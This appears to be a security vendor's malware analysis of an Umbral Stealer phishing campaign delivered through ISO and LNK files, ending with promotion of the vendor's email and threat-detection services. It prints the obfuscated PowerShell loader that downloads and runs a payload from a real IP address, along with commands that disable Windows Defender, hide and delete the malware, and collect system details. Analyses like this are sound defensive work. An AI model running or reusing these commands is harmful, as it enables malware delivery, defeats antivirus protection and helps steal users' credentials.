Malware: everybody gets one. How open‑source software steals corporate passwords
A screenshot of Umbral Stealer’s page at GitHub
The attackers chose a trivial, but still quite effective way of delivering the program—through phishing emails. In a somewhat atypical fashion, the threat actors opted for ISO rather than Microsoft Office files to disburse the stealer. An ISO file is an optical disc image of all the installation files for a single program. Launching an ISO file results in the mounting of a virtual drive in the system. In the case of Umbral Stealer, the result is a mounted drive with an LNK file titled План Рейдеров.lnk (Raider Plan.lnk). Opening this file triggers malicious activity on the victim’s computer.
More specifically, opening the LNK file prompts the launch of PowerShell to remotely execute the file MsMpEng.hta:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.* 'http://46.175.149.13/MsMpEng.hta'
MsMpEng.hta contains a VBS script that decrypts the array by subtracting 60,516 from each element, converts the array into a string, and runs it as a command:
powershell.exe" -ExecutionPolicy UnRestricted function ebdB($aLfxOjmGdGEUS, $zAiPEkMOejCWTcFA){[IO.File]::WriteAllBytes($aLfxOjmGdGEUS, $zAiPEkMOejCWTcFA)};function qxgMpLMjmzDowRlT($aLfxOjmGdGEUS){if($aLfxOjmGdGEUS.EndsWith((rdcviFZqRnwcdbvH @(74576,74630,74638,74638))) -eq $True){rundll32.exe $aLfxOjmGdGEUS }elseif($aLfxOjmGdGEUS.EndsWith((rdcviFZqRnwcdbvH @(74576,74642,74645,74579))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $aLfxOjmGdGEUS}elseif($aLfxOjmGdGEUS.EndsWith((rdcviFZqRnwcdbvH @(74576,74639,74645,74635))) -eq $True){misexec /qn /i $aLfxOjmGdGEUS}else{Start-Process $aLfxOjmGdGEUS}};function hFmIYHdonzcFhY($RNyieqzJRlYpvCPkF){$LEwHqecvjAoI = New-Object (rdcviFZqRnwcdbvH @(74608,74631,74646,74576,74617,74631,74628,74597,74638,74635,74631,74640,74646));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$zAiPEkMOejCWTcFA = $LEwHqecvjAoI.DownloadData($RNyieqzJRlYpvCPkF);return $zAiPEkMOejCWTcFA};function rdcviFZqRnwcdbvH($jcTJtVjev){$wFHXnAkiLaZC=74530;$tRBkRaiWmupKBiJ=$Null;foreach($EgCggGKPy in $jcTJtVjev){$tRBkRaiWmupKBiJ+=[char]($EgCggGKPy-$wFHXnAkiLaZC)};return $tRBkRaiWmupKBiJ};function pjDerNYZPF(){$qKSYbuAHIBPwW = $env:AppData + '\';$ANpF = $qKSYbuAHIBPwW + 'Oilio.bat'; if (Test-Path -Path $ANpF){qxgMpLMjmzDowRlT $ANpF;}Else{ $oOOiiotnzQliM = hFmIYHdonzcFhY (rdcviFZqRnwcdbvH @(74634,74646,74646,74642,74588,74577,74577,74582,74584,74576,74579,74585,74583,74576,74579,74582,74587,74576,74579,74581,74577,74609,74635,74638,74635,74641,74576,74628,74627,74646));ebdB $ANpF $oOOiiotnzQliM;qxgMpLMjmzDowRlT $ANpF;};;;;}pjDerNYZPF;
The command downloads and launches a file from a remote server. Rundll32.exe executes the file with the .dll extension. Powershell.exe or msiexec.exe are used for .ps1 or .msi, accordingly. Otherwise, the file is launched without the mediation of any additional tools.
In that case, the file Oilio.bat is downloaded from a remote server and saved locally at C:\Users\%Username%\AppData\Roaming.
The BAT file copies powershell.exe from C:\Windows\System32 to C:\Users\%Username%\AppData\Roaming\ Oilio.bat.exe and adds it to Windows Defender exclusions:
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\%username%\AppData\Roaming\Oilio.bat.exe'
Then it runs a script that extracts a Base64 string from Oilio.bat, converts the string into bytes, and decrypts them with the AES‑256‑CBC key `AA778CAE81AA8E082B9DC1B4C43D7170A89749703CE570C71028ABF2EAC4D7E3` and the initialization vector (IV) `81C41ECFD66FEDE6888118B6CF1A4DF8`. After that, the script unpacks the obtained data with the help of the GZip algorithm.
The resulting NET file checks whether this is a virtual machine environment, such as that of VMware, VirtualBox, Hyper‑V, or QEMU. To do so, it uses the fields Manufacturer and Model in the WMI query Select * from Win32_ComputerSystem. It also checks whether a debugger is running. If the environment is not a virtual one and no debugger is on, the file keeps on running. Payload.exe is executed from PE resources and decrypted with the AES-256-CBC key `214E766E9025CDD3442F90E7C36E41A80A7B4DE93EACD4B17D10F083935EAD32` and the IV `83E8EF88AFB1FD9168733393A3268AFE` and unpacked with the help of the GZip algorithm.
The file obtained through this process is the Umbral Stealer malware. It can add the path to its body to exclusions and also modify Windows Defender settings:
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
If the stealer is not running with administrative privileges, it prompts the user to grant them.
The stealer can delete itself by running the following command:
cmd.exe" /c ping localhost && del /F /A h [path to the body of the file]
The stealer can also add attributes “Hidden” and “System” to its body:
attrib.exe +h +s [path to the body of the file]
To collect information about the compromised system, Umbral uses WMI. For instance, to get the system’s unique identifier, the malware runs the following command:
wmic csproduct get uuid
To obtain information about the video controller, Umbral uses this command:
wmic path win32_VideoController get name
The system’s memory size is collected by means of:
wmic computersystem get totalphysicalmemory
To retrieve data on the OS version being used, the stealer executes the following command:
wmic os get Caption
Umbral leverages PowerShell to extract information about the processor type from the respective registry entry:
powershell.exe Get-ItemPropertyValue -Path 'HKLM:System\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name PROCESSOR_IDENTIFIER
To get information about the geolocation and IP address of the compromised system, the stealer accesses the following URL:
http://ip-api[.]com/json/?fields=225545
To achieve persistence in the compromised system, the stealer replicates itself into the autorun folder under a random name with the .scr extension.
Umbral enables its users to retrieve authentication data from the following applications:
- Brave
- Chrome
- Chromium
- Comodo
- Edge
- Epic Privacy
- Iridium
- Opera
- Opera GX
- Slimjet
- UR Browser
- Vivaldi
- Yandex
- Roblox
- Minecraft
- Discord
The stealer can also make snapshots of the desktop and take photos using the computer’s web camera.
The data collected is saved into an archive named Umbral-{Environment.MachineName}.zip and exfiltrated with the help of Discord Webhooks.
Our experience in the investigation of stealer incidents shows that attackers often use email to gain initial access to corporate networks. To protect your email communications, you can apply niche solutions that help to filter out unwanted correspondence. One of such solutions is BI.ZONE CESP. It weeds out illegitimate email traffic by carefully examining each and every message going to your inbox. BI.ZONE CESP uses more than 600 filtering rules based on machine learning and methods of statistical, signature, and heuristic analysis. This kind of inspection does not slow down the delivery of secure emails.
To stop a cyberattack at any stage of its life cycle, we also recommend delegating cyber threat detection, response, and prevention to experts. One way to do it is through BI.ZONE TDR, a service that combines a set of our proprietary technologies with insights from the BI.ZONE Cyber Threat Intelligence team.